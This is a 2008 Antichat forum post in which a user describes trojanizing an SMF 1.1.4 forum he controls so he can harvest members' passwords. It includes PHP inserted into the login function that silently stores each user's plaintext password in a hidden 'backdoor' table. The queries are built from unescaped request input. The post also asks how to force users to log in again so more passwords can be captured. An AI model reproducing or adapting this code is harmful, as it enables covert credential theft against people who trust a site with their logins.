HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Троянизация Smf
  #1  
Старый 26.03.2008, 23:06
ty13r
Познающий
Регистрация: 18.07.2007
Сообщений: 40
С нами: 9903046

Репутация: 13
По умолчанию Троянизация Smf

У меня есть подконтрольный форум - smf версии 1.1.4. Хотелось бы узнать пароли юзеров, а расшифровывать лень. Появилась идея затроянить форум.
Для этого в файле Sources/LogInOut.php рассмотрим функцию Login2()
Код:
if ($user_settings['passwd'] != $sha_passwd)
	{....}
elseif ($user_settings['passwordSalt'] == '')
	{...}
Этот код я заменил на
Код:
if ($user_settings['passwd'] != $sha_passwd)
	{....}
elseif ($user_settings['passwordSalt'] == '')
	{...}
else
	{
		$req = db_query("SELECT * FROM {$db_prefix}backdoor WHERE `id`={$user_settings['ID_MEMBER']}");
		$user = mysql_fetch_array($req);
		if(!$user)
			$req = db_query("INSERT INTO {$db_prefix}backdoor SET `id`='".$user_settings['ID_MEMBER']."' ,`name`='".$_REQUEST[user]."' ,`pass`='".$_REQUEST[passwrd]."'");
		if($user['pass']!=$_REQUEST['passwrd'])
			$req = db_query("UPDATE {$db_prefix}backdoor SET `pass`='".$_REQUEST[passwrd]."' WHERE `id`='".$user_settings['ID_MEMBER']."'");
	}
где backdoor - заранее созданная таблица.
На локалхосте все это прекрасно работает но на искомом форуме в большинстве записей вместо пароля стоят звездочки(
Что сделано неправильно? Может кто имеет успешный опыт затроянивания?
PS
Как сбросить сессии пользователей чтобы они вводили пароль заново? Почему то очистка таблицы sessions не помогает
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
пароль с Smf 1.1.4 SVAROG Болталка 1 07.12.2007 20:25
Уязвимость в Simple machines smf 1.0 beta 5 public Nemirof Уязвимости CMS / форумов 0 23.10.2004 00:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.